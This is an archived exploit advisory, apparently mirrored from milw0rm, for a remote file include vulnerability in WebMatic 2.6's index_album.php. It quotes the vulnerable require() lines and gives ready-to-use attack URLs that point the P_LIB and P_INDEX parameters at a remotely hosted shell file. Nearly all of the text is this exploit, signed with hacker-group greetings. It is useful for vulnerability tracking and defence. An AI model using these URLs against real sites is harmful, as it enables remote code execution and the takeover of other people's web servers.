Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16003
HistoryFeb 08, 2007 - 12:00 a.m.

WebMatic 2.6 (index_album.php) Remote File Include Vulnerability

2007-02-0800:00:00
vulners.com
23

-------------------------------------********************----------------------------------------------------------
#Title : WebMatic 2.6

#Author : MadNet

#Contact : MadNet[at]Hackertr[Dot]org

#S.Page : www.valarsoft.com :)

--------------------------------------*******************-----------------------------------------------------------

Error1 : require($P_LIB."lib_album.php");

Error2 : require($P_INDEX."page_album.inc");

[[RFI]]

http://[target]/[path]/core/index/index_album.php?P_LIB=[Shell]

http://[target]/[path]/core/index/index_album.php?P_INDEX=[Shell]


Example1 : [Path]/core/index/index_album.php?P_LIB=http://[path]/shell.txt

Example2 : [Path]/core/index/index_album.php?P_INDEX=http://[path]/shell.txt

''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

– MadNet From Turkey & Cyber-Sabotger Orgeneral –

–Thanks Milw0rm

milw0rm.com [2007-02-07]